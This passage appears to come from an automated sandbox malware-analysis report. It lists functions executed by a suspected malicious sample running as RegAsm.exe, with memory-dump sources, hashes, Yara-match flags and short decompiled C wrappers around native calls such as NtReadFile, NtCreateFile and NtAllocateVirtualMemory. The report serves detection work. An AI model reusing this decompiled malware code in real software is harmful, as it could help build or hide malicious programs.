                                                                                                                                                  • Instruction Fuzzy Hash: 4312EDA284E7D15FD7138B7088B9282BFB0AE17110B1E49EBC4C5CF4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0106B6E6, Relevance: .4, Instructions: 412COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: cf6ecb9f93ad06ba9d06a071d797210d6884b797f63ad07f77b88b94dd57d36d
                                                                                                                                                  • Instruction ID: e98493791d28dbcfa9f977e643b0c77319a4115a7f7abf81c673b8b1d79aa61d
                                                                                                                                                  • Opcode Fuzzy Hash: cf6ecb9f93ad06ba9d06a071d797210d6884b797f63ad07f77b88b94dd57d36d
                                                                                                                                                  • Instruction Fuzzy Hash: 4002C9A284E7D19FD7138B704CB9682BFB0AE17110B1E49EBC4C5CB4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0106B70D, Relevance: .4, Instructions: 406COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2190512315.0000000000FE2000.00000020.00020000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2190505990.0000000000FE0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000004.00000002.2190656875.0000000001074000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 895318e4893d33db52da27877b1f22562ab2fc3db991641c2ea07f4298869ebe
                                                                                                                                                  • Instruction ID: effbee842e845a853983ebf3aa77d2e029f407bca151a9595862d2830b078e6f
                                                                                                                                                  • Opcode Fuzzy Hash: 895318e4893d33db52da27877b1f22562ab2fc3db991641c2ea07f4298869ebe
                                                                                                                                                  • Instruction Fuzzy Hash: 1DF1CBA294E7D15FD7138B708CB9282BFB0AE13110B1E49EBC4C5CB4A3E21C585ED762
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Analysis Process: RegAsm.exe PID: 2464 Parent PID: 2816 RegAsm.exeCOMMON

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 008B9862, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 478nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 008B99BF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2219044296.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                  • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                  • Instruction ID: 8252e8d50f91fd4d314005f346cfedeeed6ee687a4caae13f86dea3fdd96ce88
                                                                                                                                                  • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                  • Instruction Fuzzy Hash: 53F13F70918A4D8FDBA9EF68C895AEEB7E0FF98304F40462AE44ED7251DF349641CB41
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                                                                                                  0x00419e03
                                                                                                                                                  0x00419e0f
                                                                                                                                                  0x00419e17
                                                                                                                                                  0x00419e22
                                                                                                                                                  0x00419e3d
                                                                                                                                                  0x00419e45
                                                                                                                                                  0x00419e49

                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: 2MA$2MA
                                                                                                                                                  • API String ID: 2738559852-947276439
                                                                                                                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                                                                                                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                  • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419DFE, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E00419DFE(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t29;
				void* _t31;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, 0xec8b550f, _t31); // executed
				return _t18;
			}







                                                                                                                                                  0x00419e03
                                                                                                                                                  0x00419e0f
                                                                                                                                                  0x00419e17
                                                                                                                                                  0x00419e22
                                                                                                                                                  0x00419e3d
                                                                                                                                                  0x00419e45
                                                                                                                                                  0x00419e49

                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID: 2MA$2MA
                                                                                                                                                  • API String ID: 2738559852-947276439
                                                                                                                                                  • Opcode ID: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                  • Instruction ID: 00c91bf5186e13c8f3e0094703864e9394cd14fab2ca2074de922b77fcf32330
                                                                                                                                                  • Opcode Fuzzy Hash: 617284fe934c933324e973a831cc1cf02747c2edafee5f07066d04ef82f4e86b
                                                                                                                                                  • Instruction Fuzzy Hash: 47F0A4B6200108AFCB14DF89DC91EEB77A9AF8C354F168649BA1DA7251C630E8518BA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                                  0x00419d5f
                                                                                                                                                  0x00419d67
                                                                                                                                                  0x00419d89
                                                                                                                                                  0x00419d9d
                                                                                                                                                  0x00419da1

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                  • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E00419D4B(void* __edi, void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t22;
				void* _t34;
				signed int _t37;

				_t34 = __esi + __edi;
				_t37 =  *(__edi - 0x1374aac3) * 0x8b08458b;
				_push(_t37);
				_t16 = _a4;
				_push(_t34);
				_t4 = _t16 + 0xc40; // 0xc40
				E0041A950(__edi, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t12 =  &_a20; // 0x414b77
				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t22;
			}






                                                                                                                                                  0x00419d4b
                                                                                                                                                  0x00419d4d
                                                                                                                                                  0x00419d50
                                                                                                                                                  0x00419d53
                                                                                                                                                  0x00419d59
                                                                                                                                                  0x00419d5f
                                                                                                                                                  0x00419d67
                                                                                                                                                  0x00419d89
                                                                                                                                                  0x00419d9d
                                                                                                                                                  0x00419da1

                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                  • Instruction ID: 04a2cfd867437525a0971d93455d764c76a25f5f1e9e2778de588e1df1fbb764
                                                                                                                                                  • Opcode Fuzzy Hash: 5698370e93231dcaa876b0b3758a9e2ed387f1f8c0451b227f6c083057958c12
                                                                                                                                                  • Instruction Fuzzy Hash: 72F0F6B2204149ABCB08DF98DC85CDBB7ADBF8C354B05864DFA5C93201D630E8508BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419DA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID: wKA
                                                                                                                                                  • API String ID: 823142352-3165208591
                                                                                                                                                  • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction ID: 3dc5bac7b2f0fe61b72982d3694b8f2312eed68ad843af8c69f32f3ae199a7d4
                                                                                                                                                  • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                  • Instruction Fuzzy Hash: 18F06CB2614109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 008B9DAE, Relevance: 3.1, APIs: 2, Instructions: 76nativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2219044296.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseResumeThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2308149497-0
                                                                                                                                                  • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                  • Instruction ID: 969138365b80a59cb100f30da4cee90daa832aef2713bc8ac7204a4267b1dd05
                                                                                                                                                  • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                  • Instruction Fuzzy Hash: F9218E30A14A498FCB64EF69C8887EAB7E0FF88314F40452AE54DC7350EB749981C781
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419F2B, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E00419F2B(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t25;

				_pop(es);
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A950(_t25, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                  0x00419f2c
                                                                                                                                                  0x00419f33
                                                                                                                                                  0x00419f3f
                                                                                                                                                  0x00419f47
                                                                                                                                                  0x00419f69
                                                                                                                                                  0x00419f6d

                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                  • Instruction ID: f41b3f2c5333d7f4cd888dcf998e8a17557808867dcfb89f421a74edea01d22c
                                                                                                                                                  • Opcode Fuzzy Hash: a7981a6f947ba90aa29340339cc1beb722846e32f1cf0145686f1d6ea42ff44a
                                                                                                                                                  • Instruction Fuzzy Hash: 83F052B2210218AFCB18DF89DC91EEB77ADAF88310F158209FA1C97241C630E910CBE4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                  0x00419f3f
                                                                                                                                                  0x00419f47
                                                                                                                                                  0x00419f69
                                                                                                                                                  0x00419f6d

                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                  • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E00419E7A(intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t11;

				_pop(_t15);
				asm("divps xmm6, [edx-0x74aafb60]");
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}





                                                                                                                                                  0x00419e7a
                                                                                                                                                  0x00419e7b
                                                                                                                                                  0x00419e83
                                                                                                                                                  0x00419e86
                                                                                                                                                  0x00419e8f
                                                                                                                                                  0x00419e97
                                                                                                                                                  0x00419ea5
                                                                                                                                                  0x00419ea9

                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                  • Instruction ID: b03c8a88f06c1c08a05908b4bfa387aef140f3031ec888633ef747f0f5e32563
                                                                                                                                                  • Opcode Fuzzy Hash: 0293319a2259be973812e0eb3616cb2209a4b8a2702c3dee2c2d5d41c173d62d
                                                                                                                                                  • Instruction Fuzzy Hash: 59E0C275200104AFD710EFA9CC8AFE7BB68EF48360F06459AFA5C9B241C631F690C790
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                                  0x00419e83
                                                                                                                                                  0x00419e86
                                                                                                                                                  0x00419e8f
                                                                                                                                                  0x00419e97
                                                                                                                                                  0x00419ea5
                                                                                                                                                  0x00419ea9

                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                                                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                  • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02530048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                  • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                  • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                  • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 02530078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                  • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                  • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                  • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 025300C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                  • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                  • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                  • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0252FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp Download File
